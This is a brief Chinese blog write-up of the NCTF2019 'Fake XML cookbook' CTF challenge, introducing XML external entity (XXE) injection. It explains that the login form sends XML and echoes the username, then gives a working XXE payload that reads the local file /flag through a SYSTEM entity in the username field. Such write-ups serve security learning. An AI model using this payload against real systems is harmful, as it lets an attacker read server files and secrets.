BUUFTC-日刷-[NCTF2019]Fake XML cookbook-xxe入门

登入抓包

可以发现数据是以xml格式传入的，登入失败会返回账号，同样是xml格式

而xml格式可以引用外部实体（可以是本地文件）

尝试传入

<?xml version = "1.0" encoding = "utf-8"?>
<!DOCTYPE user [
<!ENTITY file SYSTEM "file:///flag">
]>
<user><username>&file;</username><password>zhangwei666</password></user>

题目没啥意思，主要记录下xxe的脚本

posted @ 2021-12-01 14:46 Aninock 阅读(11) 评论(0) 编辑收藏举报

会员力量，点亮园子希望

刷新页面返回顶部

Loading

Aninock

BUUFTC-日刷-[NCTF2019]Fake XML cookbook-xxe入门

公告